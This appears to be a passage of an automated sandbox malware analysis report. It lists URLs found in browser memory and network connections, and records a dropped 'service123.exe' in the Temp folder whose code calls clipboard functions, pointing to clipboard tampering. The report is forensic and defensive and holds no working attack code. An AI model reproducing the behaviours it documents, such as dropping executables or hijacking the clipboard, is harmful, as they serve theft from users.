Source: chrome.exe, 00000003.00000003.1694429392.000079FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1694653197.000079FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000003.00000002.1733742861.000079FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_M1_AllAPIs_GA4Kids_Stable_20230830htt
Source: chrome.exe, 00000003.00000002.1733742861.000079FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
Source: chrome.exe, 00000003.00000002.1733742861.000079FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.1694429392.000079FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1694653197.000079FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000003.00000002.1733742861.000079FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.1694429392.000079FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1694653197.000079FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1721012438.0000350C0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000003.00000002.1723482065.0000350C00680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000003.00000002.1725362825.0000350C00C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725362825.0000350C00C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725362825.0000350C00C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000003.00000003.1703422035.0000350C003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725018900.0000350C00B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000003.00000002.1731609770.000079FC00238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000003.00000003.1694429392.000079FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1694653197.000079FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000003.00000003.1694429392.000079FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1694653197.000079FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000002.1731609770.000079FC00238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardy
Source: chrome.exe, 00000003.00000002.1733633299.000079FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000003.1711515322.0000350C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711289916.0000350C00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711661748.0000350C01264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000003.00000003.1711515322.0000350C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711289916.0000350C00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711661748.0000350C01264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000003.00000003.1695487407.000079FC00880000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711289916.0000350C00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711661748.0000350C01264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000003.00000002.1734234156.000079FC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000003.00000002.1733742861.000079FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus0
Source: chrome.exe, 00000003.00000002.1733742861.000079FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000003.00000002.1733531275.000079FC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000003.00000002.1725731616.0000350C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724831158.0000350C00A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1704614643.0000350C00C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000003.00000002.1723742692.0000350C00724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725779053.0000350C00CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724799802.0000350C00A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.1724831158.0000350C00A60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/B
Source: chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.1723824208.0000350C00758000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1722808184.0000350C004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1726319463.0000350C00D30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000003.00000002.1723824208.0000350C00758000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1722984761.0000350C00540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000003.00000002.1723824208.0000350C00758000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyn
Source: chrome.exe, 00000003.00000002.1723133314.0000350C005D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000003.00000002.1729340630.0000350C00FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1722640660.0000350C00484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000003.00000002.1724617425.0000350C009CB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1707027459.0000350C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724642126.0000350C009D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000003.00000002.1721752261.0000350C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000003.00000002.1721169146.0000350C00080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1730384977.0000350C0112C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000003.00000003.1705683879.0000350C00F49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1706906525.0000350C0074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000003.00000003.1705683879.0000350C00F49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1706906525.0000350C0074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.1705683879.0000350C00F49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1706906525.0000350C0074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000003.00000003.1705683879.0000350C00F49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1706906525.0000350C0074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000003.00000003.1705683879.0000350C00F49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1706906525.0000350C0074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000003.00000003.1705683879.0000350C00F49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724971099.0000350C00AE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1706906525.0000350C0074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.1705683879.0000350C00F49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1706906525.0000350C0074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000003.00000002.1724617425.0000350C009CB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1707027459.0000350C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724642126.0000350C009D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000003.1711515322.0000350C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711289916.0000350C00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1711661748.0000350C01264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000002.1724642126.0000350C009D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000003.00000002.1721217964.0000350C0009C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000003.00000002.1721245256.0000350C000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723951044.0000350C007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724054797.0000350C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000003.00000002.1724799802.0000350C00A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000003.00000002.1725420713.0000350C00C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000003.00000002.1723318038.0000350C00648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1722565436.0000350C00418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000003.00000002.1725881639.0000350C00CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725018900.0000350C00B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000003.00000002.1725420713.0000350C00C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000003.00000002.1724080565.0000350C0081C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Chary
Source: chrome.exe, 00000003.00000002.1725779053.0000350C00CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725391109.0000350C00C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000003.00000002.1730711731.0000350C01160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1728080179.0000350C00E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000003.00000002.1730794990.0000350C01178000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724466336.0000350C00960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724195500.0000350C0087C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000003.00000002.1721690863.0000350C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724466336.0000350C00960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1724195500.0000350C0087C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000003.00000002.1724521507.0000350C0098C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000003.00000002.1723824208.0000350C00758000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1722984761.0000350C00540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1722808184.0000350C004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000003.00000003.1711661748.0000350C01264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000003.00000002.1721874246.0000350C002A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000003.00000002.1724831158.0000350C00A60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000003.00000002.1721040391.0000350C0001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000003.00000002.1721752261.0000350C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000003.00000002.1721752261.0000350C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.1721752261.0000350C0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1723162445.0000350C005EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.1725264135.0000350C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1721752261.0000350C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.1722748836.0000350C004CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.1721527976.0000350C0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.coP
Source: chrome.exe, 00000003.00000002.1726605167.0000350C00D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000003.00000002.1726605167.0000350C00D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/5
Source: chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.1723545810.0000350C006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1726605167.0000350C00D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1721284643.0000350C000DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000003.00000002.1725291248.0000350C00BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlr
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C859C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C859C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C859C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C859C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C859D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C859D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C859E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_6C859E27

System Summary

barindex
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: u25XzKsRuY.exe Static PE information: section name:
Source: u25XzKsRuY.exe Static PE information: section name: .idata
Source: u25XzKsRuY.exe Static PE information: section name:
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002051B0 9_2_002051B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00203E20 9_2_00203E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C882CCE 9_2_6C882CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C84CD00 9_2_6C84CD00
